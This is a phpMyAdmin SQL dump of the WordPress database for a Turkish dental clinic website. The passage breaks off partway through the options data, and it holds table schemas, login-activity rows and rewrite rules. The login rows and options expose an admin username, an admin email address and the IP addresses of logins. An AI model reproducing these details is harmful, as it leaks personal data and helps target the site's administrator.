-- phpMyAdmin SQL Dump
-- version 4.9.0.1
-- https://www.phpmyadmin.net/
--
-- Anamakine: localhost:3306
-- Üretim Zamanı: 19 Ağu 2020, 13:26:24
-- Sunucu sürümü: 10.1.44-MariaDB
-- PHP Sürümü: 7.1.14

SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET AUTOCOMMIT = 0;
START TRANSACTION;
SET time_zone = "+00:00";


/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;

--
-- Veritabanı: `zedental`
--

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_aiowps_events`
--

CREATE TABLE `zdenl_aiowps_events` (
  `id` bigint(20) NOT NULL,
  `event_type` varchar(150) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `username` varchar(150) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `user_id` bigint(20) DEFAULT NULL,
  `event_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ip_or_host` varchar(100) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `referer_info` varchar(255) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `url` varchar(255) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `country_code` varchar(50) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `event_data` longtext COLLATE utf8mb4_unicode_520_ci
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_aiowps_failed_logins`
--

CREATE TABLE `zdenl_aiowps_failed_logins` (
  `id` bigint(20) NOT NULL,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `failed_login_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `login_attempt_ip` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT ''
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_aiowps_global_meta`
--

CREATE TABLE `zdenl_aiowps_global_meta` (
  `meta_id` bigint(20) NOT NULL,
  `date_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `meta_key1` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `meta_key2` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `meta_key3` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `meta_key4` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `meta_key5` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `meta_value1` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `meta_value2` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `meta_value3` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `meta_value4` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `meta_value5` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_aiowps_login_activity`
--

CREATE TABLE `zdenl_aiowps_login_activity` (
  `id` bigint(20) NOT NULL,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `login_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `logout_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `login_ip` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `login_country` varchar(150) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `browser_type` varchar(150) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT ''
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

--
-- Tablo döküm verisi `zdenl_aiowps_login_activity`
--

INSERT INTO `zdenl_aiowps_login_activity` (`id`, `user_id`, `user_login`, `login_date`, `logout_date`, `login_ip`, `login_country`, `browser_type`) VALUES
(1, 1, 'markavinci', '2018-07-18 13:08:44', '0000-00-00 00:00:00', '217.131.94.176', '', ''),
(2, 1, 'markavinci', '2018-07-18 20:33:48', '0000-00-00 00:00:00', '217.131.94.176', '', ''),
(3, 1, 'markavinci', '2018-07-19 16:21:15', '0000-00-00 00:00:00', '217.131.94.176', '', ''),
(4, 1, 'markavinci', '2018-07-23 14:12:32', '0000-00-00 00:00:00', '217.131.94.176', '', ''),
(5, 1, 'markavinci', '2018-07-25 17:14:36', '0000-00-00 00:00:00', '217.131.90.24', '', ''),
(6, 1, 'markavinci', '2018-08-01 13:29:58', '0000-00-00 00:00:00', '217.131.92.222', '', ''),
(7, 1, 'markavinci', '2018-11-28 13:33:11', '0000-00-00 00:00:00', '217.131.90.164', '', ''),
(8, 1, 'markavinci', '2018-11-30 18:54:16', '0000-00-00 00:00:00', '217.131.94.232', '', ''),
(9, 1, 'markavincim', '2020-02-10 16:34:15', '0000-00-00 00:00:00', '94.122.155.109', '', '');

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_aiowps_login_lockdown`
--

CREATE TABLE `zdenl_aiowps_login_lockdown` (
  `id` bigint(20) NOT NULL,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `lockdown_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `release_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `failed_login_ip` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `lock_reason` varchar(128) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `unlock_key` varchar(128) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT ''
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_aiowps_permanent_block`
--

CREATE TABLE `zdenl_aiowps_permanent_block` (
  `id` bigint(20) NOT NULL,
  `blocked_ip` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `block_reason` varchar(128) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `country_origin` varchar(50) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `blocked_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `unblock` tinyint(1) NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_commentmeta`
--

CREATE TABLE `zdenl_commentmeta` (
  `meta_id` bigint(20) UNSIGNED NOT NULL,
  `comment_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_520_ci
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_comments`
--

CREATE TABLE `zdenl_comments` (
  `comment_ID` bigint(20) UNSIGNED NOT NULL,
  `comment_post_ID` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `comment_author` tinytext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `comment_author_email` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `comment_author_url` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `comment_author_IP` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `comment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `comment_content` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `comment_karma` int(11) NOT NULL DEFAULT '0',
  `comment_approved` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '1',
  `comment_agent` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `comment_type` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `comment_parent` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `user_id` bigint(20) UNSIGNED NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_links`
--

CREATE TABLE `zdenl_links` (
  `link_id` bigint(20) UNSIGNED NOT NULL,
  `link_url` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `link_name` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `link_image` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `link_target` varchar(25) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `link_description` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `link_visible` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) UNSIGNED NOT NULL DEFAULT '1',
  `link_rating` int(11) NOT NULL DEFAULT '0',
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `link_notes` mediumtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `link_rss` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT ''
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_options`
--

CREATE TABLE `zdenl_options` (
  `option_id` bigint(20) UNSIGNED NOT NULL,
  `option_name` varchar(191) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `option_value` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `autoload` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'yes'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

--
-- Tablo döküm verisi `zdenl_options`
--

INSERT INTO `zdenl_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(1, 'siteurl', 'http://www.ze-dent.com/', 'yes'),
(2, 'home', 'http://www.ze-dent.com/', 'yes'),
(3, 'blogname', 'ZEDENT - Ağız ve Diş Sağlığı Polikliniği', 'yes'),
(4, 'blogdescription', '', 'yes'),
(5, 'users_can_register', '0', 'yes'),
(6, 'admin_email', 'markavincim@gmail.com', 'yes'),
(7, 'start_of_week', '1', 'yes'),
(8, 'use_balanceTags', '0', 'yes'),
(9, 'use_smilies', '1', 'yes'),
(10, 'require_name_email', '1', 'yes'),
(11, 'comments_notify', '', 'yes'),
(12, 'posts_per_rss', '10', 'yes'),
(13, 'rss_use_excerpt', '0', 'yes'),
(14, 'mailserver_url', 'mail.example.com', 'yes'),
(15, 'mailserver_login', 'login@example.com', 'yes'),
(16, 'mailserver_pass', 'password', 'yes'),
(17, 'mailserver_port', '110', 'yes'),
(18, 'default_category', '1', 'yes'),
(19, 'default_comment_status', 'closed', 'yes'),
(20, 'default_ping_status', 'closed', 'yes'),
(21, 'default_pingback_flag', '', 'yes'),
(22, 'posts_per_page', '10', 'yes'),
(23, 'date_format', 'j F Y', 'yes'),
(24, 'time_format', 'H:i', 'yes'),
(25, 'links_updated_date_format', 'j F Y H:i', 'yes'),
(26, 'comment_moderation', '1', 'yes'),
(27, 'moderation_notify', '', 'yes'),
(28, 'permalink_structure', '/%postname%/', 'yes'),
(29, 'rewrite_rules', 'a:195:{s:11:\"^wp-json/?$\";s:22:\"index.php?rest_route=/\";s:14:\"^wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:21:\"^index.php/wp-json/?$\";s:22:\"index.php?rest_route=/\";s:24:\"^index.php/wp-json/(.*)?\";s:33:\"index.php?rest_route=/$matches[1]\";s:47:\"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:42:\"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$\";s:52:\"index.php?category_name=$matches[1]&feed=$matches[2]\";s:23:\"category/(.+?)/embed/?$\";s:46:\"index.php?category_name=$matches[1]&embed=true\";s:35:\"category/(.+?)/page/?([0-9]{1,})/?$\";s:53:\"index.php?category_name=$matches[1]&paged=$matches[2]\";s:17:\"category/(.+?)/?$\";s:35:\"index.php?category_name=$matches[1]\";s:44:\"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:39:\"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:42:\"index.php?tag=$matches[1]&feed=$matches[2]\";s:20:\"tag/([^/]+)/embed/?$\";s:36:\"index.php?tag=$matches[1]&embed=true\";s:32:\"tag/([^/]+)/page/?([0-9]{1,})/?$\";s:43:\"index.php?tag=$matches[1]&paged=$matches[2]\";s:14:\"tag/([^/]+)/?$\";s:25:\"index.php?tag=$matches[1]\";s:45:\"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:40:\"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:50:\"index.php?post_format=$matches[1]&feed=$matches[2]\";s:21:\"type/([^/]+)/embed/?$\";s:44:\"index.php?post_format=$matches[1]&embed=true\";s:33:\"type/([^/]+)/page/?([0-9]{1,})/?$\";s:51:\"index.php?post_format=$matches[1]&paged=$matches[2]\";s:15:\"type/([^/]+)/?$\";s:33:\"index.php?post_format=$matches[1]\";s:42:\"us_grid_layout/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:52:\"us_grid_layout/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:72:\"us_grid_layout/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:67:\"us_grid_layout/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:67:\"us_grid_layout/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:48:\"us_grid_layout/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:31:\"us_grid_layout/([^/]+)/embed/?$\";s:47:\"index.php?us_grid_layout=$matches[1]&embed=true\";s:35:\"us_grid_layout/([^/]+)/trackback/?$\";s:41:\"index.php?us_grid_layout=$matches[1]&tb=1\";s:43:\"us_grid_layout/([^/]+)/page/?([0-9]{1,})/?$\";s:54:\"index.php?us_grid_layout=$matches[1]&paged=$matches[2]\";s:50:\"us_grid_layout/([^/]+)/comment-page-([0-9]{1,})/?$\";s:54:\"index.php?us_grid_layout=$matches[1]&cpage=$matches[2]\";s:39:\"us_grid_layout/([^/]+)(?:/([0-9]+))?/?$\";s:53:\"index.php?us_grid_layout=$matches[1]&page=$matches[2]\";s:31:\"us_grid_layout/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:41:\"us_grid_layout/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:61:\"us_grid_layout/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\"us_grid_layout/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\"us_grid_layout/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:37:\"us_grid_layout/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:37:\"us_header/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:47:\"us_header/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:67:\"us_header/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:62:\"us_header/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:62:\"us_header/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:43:\"us_header/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:26:\"us_header/([^/]+)/embed/?$\";s:42:\"index.php?us_header=$matches[1]&embed=true\";s:30:\"us_header/([^/]+)/trackback/?$\";s:36:\"index.php?us_header=$matches[1]&tb=1\";s:38:\"us_header/([^/]+)/page/?([0-9]{1,})/?$\";s:49:\"index.php?us_header=$matches[1]&paged=$matches[2]\";s:45:\"us_header/([^/]+)/comment-page-([0-9]{1,})/?$\";s:49:\"index.php?us_header=$matches[1]&cpage=$matches[2]\";s:34:\"us_header/([^/]+)(?:/([0-9]+))?/?$\";s:48:\"index.php?us_header=$matches[1]&page=$matches[2]\";s:26:\"us_header/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:36:\"us_header/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:56:\"us_header/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:51:\"us_header/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:51:\"us_header/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:32:\"us_header/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:41:\"hizmetlerimiz/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:51:\"hizmetlerimiz/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:71:\"hizmetlerimiz/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:66:\"hizmetlerimiz/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:66:\"hizmetlerimiz/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:47:\"hizmetlerimiz/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:30:\"hizmetlerimiz/([^/]+)/embed/?$\";s:45:\"index.php?us_portfolio=$matches[1]&embed=true\";s:34:\"hizmetlerimiz/([^/]+)/trackback/?$\";s:39:\"index.php?us_portfolio=$matches[1]&tb=1\";s:42:\"hizmetlerimiz/([^/]+)/page/?([0-9]{1,})/?$\";s:52:\"index.php?us_portfolio=$matches[1]&paged=$matches[2]\";s:49:\"hizmetlerimiz/([^/]+)/comment-page-([0-9]{1,})/?$\";s:52:\"index.php?us_portfolio=$matches[1]&cpage=$matches[2]\";s:38:\"hizmetlerimiz/([^/]+)(?:/([0-9]+))?/?$\";s:51:\"index.php?us_portfolio=$matches[1]&page=$matches[2]\";s:30:\"hizmetlerimiz/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:40:\"hizmetlerimiz/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:60:\"hizmetlerimiz/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:55:\"hizmetlerimiz/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:55:\"hizmetlerimiz/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:36:\"hizmetlerimiz/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:63:\"hizmetlerimiz_category/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:60:\"index.php?us_portfolio_category=$matches[1]&feed=$matches[2]\";s:58:\"hizmetlerimiz_category/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:60:\"index.php?us_portfolio_category=$matches[1]&feed=$matches[2]\";s:39:\"hizmetlerimiz_category/([^/]+)/embed/?$\";s:54:\"index.php?us_portfolio_category=$matches[1]&embed=true\";s:51:\"hizmetlerimiz_category/([^/]+)/page/?([0-9]{1,})/?$\";s:61:\"index.php?us_portfolio_category=$matches[1]&paged=$matches[2]\";s:33:\"hizmetlerimiz_category/([^/]+)/?$\";s:43:\"index.php?us_portfolio_category=$matches[1]\";s:42:\"us_widget_area/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:52:\"us_widget_area/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:72:\"us_widget_area/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:67:\"us_widget_area/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:67:\"us_widget_area/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:48:\"us_widget_area/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:31:\"us_widget_area/([^/]+)/embed/?$\";s:47:\"index.php?us_widget_area=$matches[1]&embed=true\";s:35:\"us_widget_area/([^/]+)/trackback/?$\";s:41:\"index.php?us_widget_area=$matches[1]&tb=1\";s:43:\"us_widget_area/([^/]+)/page/?([0-9]{1,})/?$\";s:54:\"index.php?us_widget_area=$matches[1]&paged=$matches[2]\";s:50:\"us_widget_area/([^/]+)/comment-page-([0-9]{1,})/?$\";s:54:\"index.php?us_widget_area=$matches[1]&cpage=$matches[2]\";s:39:\"us_widget_area/([^/]+)(?:/([0-9]+))?/?$\";s:53:\"index.php?us_widget_area=$matches[1]&page=$matches[2]\";s:31:\"us_widget_area/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:41:\"us_widget_area/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:61:\"us_widget_area/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\"us_widget_area/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:56:\"us_widget_area/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:37:\"us_widget_area/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:37:\"us_footer/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:47:\"us_footer/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:67:\"us_footer/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:62:\"us_footer/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:62:\"us_footer/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:43:\"us_footer/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:26:\"us_footer/([^/]+)/embed/?$\";s:42:\"index.php?us_footer=$matches[1]&embed=true\";s:30:\"us_footer/([^/]+)/trackback/?$\";s:36:\"index.php?us_footer=$matches[1]&tb=1\";s:38:\"us_footer/([^/]+)/page/?([0-9]{1,})/?$\";s:49:\"index.php?us_footer=$matches[1]&paged=$matches[2]\";s:45:\"us_footer/([^/]+)/comment-page-([0-9]{1,})/?$\";s:49:\"index.php?us_footer=$matches[1]&cpage=$matches[2]\";s:34:\"us_footer/([^/]+)(?:/([0-9]+))?/?$\";s:48:\"index.php?us_footer=$matches[1]&page=$matches[2]\";s:26:\"us_footer/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:36:\"us_footer/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:56:\"us_footer/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:51:\"us_footer/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:51:\"us_footer/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:32:\"us_footer/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:40:\"vc_grid_item/[^/]+/attachment/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:50:\"vc_grid_item/[^/]+/attachment/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:70:\"vc_grid_item/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"vc_grid_item/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:65:\"vc_grid_item/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:46:\"vc_grid_item/[^/]+/attachment/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:29:\"vc_grid_item/([^/]+)/embed/?$\";s:45:\"index.php?vc_grid_item=$matches[1]&embed=true\";s:33:\"vc_grid_item/([^/]+)/trackback/?$\";s:39:\"index.php?vc_grid_item=$matches[1]&tb=1\";s:41:\"vc_grid_item/([^/]+)/page/?([0-9]{1,})/?$\";s:52:\"index.php?vc_grid_item=$matches[1]&paged=$matches[2]\";s:48:\"vc_grid_item/([^/]+)/comment-page-([0-9]{1,})/?$\";s:52:\"index.php?vc_grid_item=$matches[1]&cpage=$matches[2]\";s:37:\"vc_grid_item/([^/]+)(?:/([0-9]+))?/?$\";s:51:\"index.php?vc_grid_item=$matches[1]&page=$matches[2]\";s:29:\"vc_grid_item/[^/]+/([^/]+)/?$\";s:32:\"index.php?attachment=$matches[1]\";s:39:\"vc_grid_item/[^/]+/([^/]+)/trackback/?$\";s:37:\"index.php?attachment=$matches[1]&tb=1\";s:59:\"vc_grid_item/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:54:\"vc_grid_item/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$\";s:49:\"index.php?attachment=$matches[1]&feed=$matches[2]\";s:54:\"vc_grid_item/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$\";s:50:\"index.php?attachment=$matches[1]&cpage=$matches[2]\";s:35:\"vc_grid_item/[^/]+/([^/]+)/embed/?$\";s:43:\"index.php?attachment=$matches[1]&embed=true\";s:12:\"robots\\.txt$\";s:18:\"index.php?robots=1\";s:48:\".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$\";s:18:\"index.php?feed=old\";s:20:\".*wp-app\\.php(/.*)?$\";s:19:\"index.php?error=403\";s:18:\".*wp-register.php$\";s:23:\"index.php?register=t